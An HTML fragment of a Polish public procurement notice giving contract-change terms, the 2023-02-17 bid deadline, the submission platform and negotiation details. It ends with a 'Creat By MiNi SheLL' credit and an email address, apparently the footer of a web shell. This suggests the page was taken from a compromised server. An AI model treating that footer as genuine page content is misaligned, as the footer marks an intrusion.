<span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mieroszow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-17 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-18</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com